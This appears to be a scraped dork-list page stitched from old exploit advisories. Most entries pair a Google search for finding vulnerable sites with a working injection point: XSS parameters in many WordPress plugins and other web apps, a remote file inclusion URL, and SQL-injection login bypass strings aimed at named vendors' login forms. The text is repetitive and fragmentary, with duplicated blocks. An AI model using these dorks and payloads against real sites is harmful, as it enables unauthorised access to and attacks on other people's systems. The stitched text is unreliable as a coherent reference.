Next Page >>
Google Search
Only if your site is vulrnable we wil disclose the detaisl to site admin.
Google Search: (Index.exe)
http://www.google.com/search?hl=en&q=ext%3Aexe+inurl%3A%28Services%29&btnG=Search
Google Search: (Center.exe)
Search for this on your favorite search engine (Google/Bing)
------------------------------------------------------------
filetype:pdf file c (htm OR html OR mhtml)
Google Search 1 (for drive C)
[http://www.google.com/search?hl=en&q=filetype%3Apdf+file+c+%28htm+OR+html+O
R+mhtml%29&btnG=Search&aq=f&oq=&aqi=] – 4 million results
Google Search 2 (for drive D)
[http://www.google.com/search?hl=en&q=filetype%3Apdf+file+d+%28htm+OR+html+O
R+mhtml%29&btnG=Search&aq=f&oq=&aqi=] – 13 million results
Search for this on your favorite search engine (Google/Bing)
------------------------------------------------------------
filetype:pdf file c (htm OR html OR mhtml)
Google Search 1 (for drive C)
[http://www.google.com/search?hl=en&q=filetype%3Apdf+file+c+%28htm+OR+html+O
R+mhtml%29&btnG=Search&aq=f&oq=&aqi=] - 4 million results
Google Search 2 (for drive D)
[http://www.google.com/search?hl=en&q=filetype%3Apdf+file+d+%28htm+OR+html+O
R+mhtml%29&btnG=Search&aq=f&oq=&aqi=] - 13 million results
# #
# Download......: http://wordpress.org/extend/plugins/the-welcomizer/ #
# #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/the-welcomizer/twiz-index.php?page=[xss] #
# #
# Google Search.: "Powered by Wordpress" #
# #
####################################################################################################################
# #
# Bug Found.....: IrIsT.Ir #
# #
http://Aria-Security.net
-------------------------------
Shutouts: AurA, imm02tal
Original Advisory and more info about this vulnerability: http://forum.aria-security.net/showthread.php?p=1442
Vendor: http://www.bestwebapp.com
Google Search: inurl:login_form.asp DATING Website
Login_form.asp
Chose Any username you want, doesnt matter, it can be admin, or just a normal user. YOU CHOSE!
Password: anything' OR 'x'='x
Aria-Security Team,
http://Aria-Security.net
-------------------------------
Shout Outs:
Vendor: http://www.site2nite.com/
Google Search: Website Development Provided By: Site2Nite
Username: anything' OR 'x'='x
Password: anything' OR 'x'='x
# #
# Download......: http://wordpress.org/extend/plugins/1-jquery-photo-gallery-slideshow-flash/ #
# #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/1-jquery-photo-gallery-slideshow-flash/wp-1pluginjquery.php?page=[xss] #
# #
# Google Search.: "Powered by Wordpress" #
# #
############################################################################################################################################
# #
# Bug Found.....: IrIsT.Ir #
# #
> # #
> # contact.......: Amir[at]IrIsT.ir #
> # #
> # Exploit.......: http://www.site.com/browse.php?keywords=[xss]&search=Search&projects=1&styles=1&forums=1 #
> # #
> # Google Search.: "Powered By PunBB" #
> # #
> # SP TNX........: B3HZ4D & satanicstar & SeCuRiTy & m3hdi & vahid4251 & all IrIsT members #
> # & h4ckcity.org & phc.ir & all SP #
> # #
> #####################################################################################################################
# #
# contact.......: Amir[at]IrIsT.ir #
# #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=[xss] #
# #
# Google Search.: "Powered By wordpress" #
# #
# SP TNX........: B3HZ4D & satanicstar & SeCuRiTy & m3hdi & vahid4251 & all IrIsT members #
# & h4ckcity.org & phc.ir & zarbat.org & kalkalhacking.iranpanel.com & farbodmahini &all SP #
# #
#####################################################################################################################
Google Search:
google:allinurl:"/auth/lostPassword.php"
# #
# Download......: http://wordpress.org/extend/plugins/enable-latex/ #
# #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/enable-latex/core.php?url=[Rfi]? #
# #
# Google Search.: "Powered by Wordpress" #
# #
################################################################################################################################
# #
# Bug Found.....: Aria-Security #
# #
> # #
> # Download......: http://wordpress.org/extend/plugins/enable-latex/ #
> # #
> # Exploit.......: http://www.site.com/[path]/wp-content/plugins/enable-latex/core.php?url=[Rfi]? #
> # #
> # Google Search.: "Powered by Wordpress" #
> # #
> ################################################################################################################################
> # #
> # Bug Found.....: Aria-Security #
> # #
# #
# Download......: http://wordpress.org/extend/plugins/meenews/ #
# #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/meenews/newsletter.php?idnews=[xss] #
# #
# Google Search.: "Powered by Wordpress" #
# #
############################################################################################################
# #
# Bug Found.....: Aria-Security #
# #
/cgi-bin/dnewsweb.exe?utag=XSS
Google Search: (dnewsweb.exe)
http://www.google.com/search?hl=en&q=ext%3Aexe+inurl%3A%28%7Cdnewsweb.exe%7C%29&btnG=Search
# #
# Download......: http://wordpress.org/extend/plugins/flash-album-gallery/ #
# #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/flash-album-gallery/facebook.php?i=[xss] #
# #
# Google Search.: "Powered by Wordpress" #
# #
######################################################################################################################
# #
# Bug Found.....: IrIsT.Ir #
# #
# #
# contact.......: Admin[at]IrIsT.ir #
# #
# Exploit.......: http://[site]/[path]/input.php?nickname=[XSS]&color=[XSS] #
# #
# Google Search.: "Powered By MataChat" #
# #
# SP TNX........: Dr.FlagHk & satanicstar & bl4ck-h4t-b0ys & all IrIsT members #
# #
######################################################################################################
# #
# contact.......: Amir[at]IrIsT.ir #
# #
# Exploit.......: Exploit.......: http://www.site.com/[path]/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=[xss] #
# #
# Google Search.: "Powered by Wordpress" #
# #
# Me............: IrIsT.Ir = (Amir) & Aria-security.com = ( The-0utl4w ) #
# #
##########################################################################################################################################
# #
# contact.......: Amir[at]IrIsT.ir #
# #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=[xss] #
# #
# Google Search.: "Powered by Wordpress" #
# #
# SP TNX........: B3HZ4D & joker_s & The-0utl4w & m3hdi & vahid4251 & all IrIsT members #
# #
# & h4ckcity.org & phcsec.ir & zarbat.org & kalkalhacking.orq.ir & all SP #
# #
# #
# contact.......: Amir[at]IrIsT.ir #
# #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=[xss] #
# #
# Google Search.: "Powered By wordpress" #
# #
# SP TNX........: B3HZ4D & satanicstar & SeCuRiTy & m3hdi & vahid4251 & all IrIsT members #
# & h4ckcity.org & phc.ir & zarbat.org & kalkalhacking.iranpanel.com & farbodmahini &all SP #
# #
#####################################################################################################################
> # #
> # Download......: http://wordpress.org/extend/plugins/pretty-link/ #
> # #
> # Exploit.......: http://www.site.com/[path]/wp-content/plugins/pretty-link/pretty-bar.php?url=[xss] #
> # #
> # Google Search.: "Powered by Wordpress" #
> # #
> ############################################################################################################################################
> # #
> # Bug Found.....: IrIsT.Ir #
> # #
http://img296.imageshack.us/img296/1318/hack1br6.jpg
Google Search:
http://www.google.com/search?hl=en&q=%2Fforum%2Flogin_user.asp%3FRedirect%3D%2F&btnG=Google+Search
/forum_text_search_action.php?search_string=<XSS>&titles=Search
/forum_text_search_action.php?search_string=<XSS>&bodies=Search
Google Search:
http://www.google.com/search?hl=en&q=Powered+by+BOINC&btnG=Search
# #
# Download......: http://wordpress.org/extend/plugins/skysa-official/ #
# #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/skysa-official/skysa.php?submit=[xss] #
# #
# Google Search.: "Powered by Wordpress" #
# #
####################################################################################################################
# #
# Bug Found.....: IrIsT.Ir #
# #
> # #
> # Download......: http://wordpress.org/extend/plugins/enable-latex/ #
> # #
> # Exploit.......: http://www.site.com/[path]/wp-content/plugins/enable-latex/core.php?url=[Rfi]? #
> # #
> # Google Search.: "Powered by Wordpress" #
> # #
> ################################################################################################################################
> # #
> # Bug Found.....: Aria-Security #
> # #
# #
# contact.......: Amir[at]IrIsT.ir #
# #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=[xss] #
# #
# Google Search.: "Powered by Wordpress" #
# #
# Me............: IrIsT.Ir & Aria-security.com #
# #
################################################################################################################################
http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal
Vendor: http://www.freshink.net/rc-links.htm
Demo: http://www.lite.freshink.net/admin_logon.asp
Google Search: Developed by: GA Soft
Username: anything' OR 'x'='x
password: anything' OR 'x'='x
Regards,
Aria-Security Team,
http://Aria-Security.net
-------------------------------
Shout Outs: AurA, imm02tal
Vendor: http://gartha.net
Google Search: intitle:Corporate Contact System
insert your command in the section "search"
example:
'having 1=1--
Result:
# #
# contact.......: Amir[at]IrIsT.ir #
# #
# Exploit.......: http://www.site.com/[path]/wp-content/plugins/adminimize/adminimize_page.php?page=[xss] #
# #
# Google Search.: "Powered by Wordpress" #
# #
# #
# SP TNX........: B3HZ4D & joker_s & The-0utl4w & m3hdi & vahid4251 & all IrIsT members #
# & h4ckcity.org & phcsec.ir & zarbat.org & all SP #
# #
%% Disconvered on: 10 December 2008
%% Name: Max's Guestbook
%% Version: 1.0
%% URL: http://www.phpf1.com/product/php-guestbook-script.html
%% URL2: http://www.hotscripts.com/Detailed/78571.html
%% Google Search: intitle:"Max's Guestbook" powered-by-PHP-F1
%%
%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# #
# contact.......: Admin [at] IrIsT.ir #
# #
# Exploit.......: http://[site]/[path]/?page=[XsS]&mode=search #
# #
# Google Search.: "Powered By BizDirectory 2.04" Or Inurl:"BizDirectory2.04" #
# #
# SP TNX........: dr.flaghk #
# #
###############################################################################
Next Page>>
|
